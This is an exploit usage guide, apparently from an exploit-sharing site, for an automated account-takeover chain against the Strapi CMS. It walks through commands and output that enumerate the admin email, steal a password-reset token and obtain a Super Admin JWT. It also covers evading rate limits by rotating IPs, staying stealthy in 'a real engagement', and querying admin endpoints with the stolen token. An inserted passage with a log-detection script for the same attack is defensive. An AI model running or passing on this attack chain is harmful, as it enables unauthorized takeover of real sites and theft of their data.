Source: https://sploitus.com/exploit?id=F138AC00-6A8B-5A86-B910-839244A18944
# CVE-2026-27886 Automated Exploit - Usage Guide
## What This Script Does
Automates the full account takeover chain in 4 HTTP request groups:
1. **Vulnerability Verification** - Confirms the target is vulnerable
2. **Email Enumeration** - Extracts admin email via boolean oracle (~500 requests)
3. **Password Reset Trigger** - Initiates Strapi's password recovery flow
4. **Token Exfiltration** - Steals the 40-char reset token (~320 requests)
5. **Account Takeover** - Uses stolen token to get Super Admin JWT
## Basic Usage
### Verify-Only Mode (Safe)
Check if target is vulnerable without exploitation:
```bash
./cve-2026-27886-exploit.py https://target/api/articles --verify-only
```
### Full Exploit (Quickest)
Automate everything if you don't know the admin email:
```bash
./cve-2026-27886-exploit.py https://target/api/articles
```
**Output:**
```
[+] Target: https://target/api/articles
[+] Base URL: https://target
[*] Verifying vulnerability...
[+] Vulnerable: baseline=12, where_test=0
[*] Enumerating admin email...
admin@example.com
[*] Triggering password reset for admin@example.com...
[+] Password reset triggered (HTTP 204)
[*] Extracting 40-char reset token...
[100%] d1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a
[*] Resetting password with stolen token...
[+] Password reset successful!
[+] JWT: eyJhbGciOiJIUzI1NiIs...
[+] User: admin@example.com (ID: 1)
[+] SUCCESS! Admin account compromised.
[+] JWT Token:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
```
### Skip Email Enumeration (Faster)
If you already know the admin email (saves ~500 requests):
```bash
./cve-2026-27886-exploit.py https://target/api/articles \
--email admin@example.com
```
### Custom Password
Set a custom password instead of default:
```bash
./cve-2026-27886-exploit.py https://target/api/articles \
--email admin@example.com \
--password "MyPassword123!"
```
### Add Delays (Avoid Rate Limits)
If the target has rate limiting:
```bash
./cve-2026-27886-exploit.py https://target/api/articles \
--delay 0.1
```
This adds 100ms between each request (~2-3 minutes for full exploitation).
### Explicit Base URL
If `/admin/*` endpoints are on a different host:
```bash
./cve-2026-27886-exploit.py https://api.target/articles \
--base-url https://admin.target
```
## CTF Scenarios
### Scenario 1: You Have Nothing, Need Everything
```bash
./cve-2026-27886-exploit.py https://ctf-challenge/api/posts
```
→ Enumerates email, triggers reset, steals token, gets JWT
### Scenario 2: You Have the Admin Email
```bash
./cve-2026-27886-exploit.py https://ctf-challenge/api/posts \
--email admin@ctf-challenge.local
```
→ Skips email enumeration, saves ~2 minutes
### Scenario 3: Target Has Rate Limiting
```bash
./cve-2026-27886-exploit.py https://ctf-challenge/api/posts \
--delay 0.05 \
--email admin@ctf-challenge.local
```
→ Slower but avoids triggering WAF/rate limits
### Scenario 4: Find the Flag Endpoint
After getting JWT, explore `/admin/*`:
```bash
# Use the JWT in subsequent requests (JWT is a placeholder for the token the script printed)
JWT="<paste-jwt-here>"
curl -H "Authorization: Bearer $JWT" \
https://ctf-challenge/admin/content-manager/collection-types/admin::user/1
# Or look for custom endpoints
curl -H "Authorization: Bearer $JWT" \
https://ctf-challenge/admin/settings
# Or check database access
curl -H "Authorization: Bearer $JWT" \
https://ctf-challenge/admin/database-config
```
## What the Output Tells You
| Output | Meaning |
|--------|---------|
| `[+] Vulnerable: baseline=12, where_test=0` | Target is vulnerable; 12 rows in collection |
| `admin@example.com` | Enumerated admin email |
| `[+] Password reset triggered (HTTP 204)` | Reset token created on server |
| `[100%] d1a2...` | Token extraction complete (40 hex chars) |
| `[+] JWT: eyJ...` | Account takeover successful! |
| `[-] Not vulnerable: baseline=12, where_test=12` | Target is patched (5.37.0+) |
| `[-] Failed to enumerate email` | Collection may be empty or email unreachable |
## Common Issues
### "Non-JSON response"
- Wrong endpoint (not a Strapi Content API collection)
- Try: `https://target/api/products`, `https://target/api/articles`, etc.
### "Failed to enumerate email"
- Collection is empty (no `updated_by_id` foreign keys)
- Admin role doesn't match anyone in the database
- Try a different endpoint if multiple exist
### "Failed to extract reset token"
- Password reset wasn't triggered
- Different admin email than guessed
- Token expired (try again, it lasts ~24 hours by default)
### Getting rate-limited
- Add `--delay 0.05` or higher
- Or use a VPN/proxy to rotate IP addresses
## Security Notes
This script:
- ✅ Only makes GET/POST requests (no data modification)
- ✅ Targets only the vulnerable Strapi query parameter bypass
- ✅ Uses Strapi's legitimate password reset endpoints
- ✅ Leaves no stored artifacts on the target
- ⚠️ **IS LOUD** - Makes 800+ requests in sequence (obvious in logs)
For stealth in a real engagement, add delays and spread across multiple collection endpoints.
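What "obvious in logs" looks like from the defender's side, as an added example that is not part of the exploit script, this guide, or Strapi itself: the chain above produces hundreds of filtered Content API reads from one client in a few minutes, then a password-reset request against the admin API. The script below scans access-log lines for that sequence. It assumes combined-format access logs and an admin reset path of `/admin/forgot-password`; the sample log lines, IPs and the `probe=` query string are constructed for the demonstration.

```python
#!/usr/bin/env python3
"""Flag the read-burst-then-reset pattern described in the usage guide.

Added detection example (not the exploit's or Strapi's code). Assumptions:
combined-format access logs, and /admin/forgot-password as the reset path.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined log format: ip ident user [timestamp] "METHOD path proto" status size
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S"
RESET_PATH = "/admin/forgot-password"  # assumed admin reset endpoint


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        # Drop the "+0000" offset; the window logic only needs relative order.
        "ts": datetime.strptime(m.group("ts").split()[0], TS_FMT),
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def is_filtered_content_read(rec):
    """Content API collection read carrying a query string (where the oracle probes go)."""
    return rec["method"] == "GET" and rec["path"].startswith("/api/") and "?" in rec["path"]


def is_reset_trigger(rec):
    return rec["method"] == "POST" and rec["path"].startswith(RESET_PATH)


def find_oracle_bursts(lines, window=timedelta(minutes=5), threshold=100):
    """Return {ip: {"peak_reads": n, "reset_after_burst": bool}} for every client
    whose filtered reads inside any window-long span reach the threshold."""
    reads = defaultdict(list)
    resets = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if is_filtered_content_read(rec):
            reads[rec["ip"]].append(rec["ts"])
        elif is_reset_trigger(rec):
            resets[rec["ip"]].append(rec["ts"])

    findings = {}
    for ip, stamps in reads.items():
        stamps.sort()
        start, peak = 0, 0
        for end, ts in enumerate(stamps):  # sliding window over sorted timestamps
            while ts - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            followed = any(r >= stamps[0] for r in resets.get(ip, []))
            findings[ip] = {"peak_reads": peak, "reset_after_burst": followed}
    return findings


def build_sample_log():
    """Constructed sample: one client probing a collection 150 times in 150 s and
    then requesting a reset, plus one ordinary reader paging through it."""
    base = datetime(2026, 3, 1, 12, 0, 0)
    lines = []
    for i in range(150):
        ts = (base + timedelta(seconds=i)).strftime(TS_FMT)
        lines.append(f'203.0.113.7 - - [{ts} +0000] "GET /api/articles?probe={i} HTTP/1.1" 200 2')
    ts = (base + timedelta(seconds=151)).strftime(TS_FMT)
    lines.append(f'203.0.113.7 - - [{ts} +0000] "POST {RESET_PATH} HTTP/1.1" 204 0')
    for i in range(3):
        ts = (base + timedelta(minutes=i)).strftime(TS_FMT)
        lines.append(f'198.51.100.4 - - [{ts} +0000] "GET /api/articles?pagination[page]={i + 1} HTTP/1.1" 200 4096')
    return lines


SAMPLE_LOG = build_sample_log()

if __name__ == "__main__":
    for ip, info in find_oracle_bursts(SAMPLE_LOG).items():
        print(f"{ip}: {info['peak_reads']} filtered reads in window, reset followed: {info['reset_after_burst']}")
```

The threshold of 100 reads per five minutes is deliberately far below the ~800 the guide quotes, so the `--delay` variants still trip it; tune it against the normal read rate of the deployment's own collections before alerting on it.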
## Proving Your Friends Wrong
Run this when they're watching:
```bash
echo "[*] Starting automated Strapi account takeover..."
time ./cve-2026-27886-exploit.py https://ctf-challenge/api/articles
# They'll see:
# - Email auto-discovered
# - Token auto-extracted
# - Admin account taken over in ~5 minutes
# - Full JWT printed
#
# Drop the mic 🎤
```
Good luck in your CTF! 🚩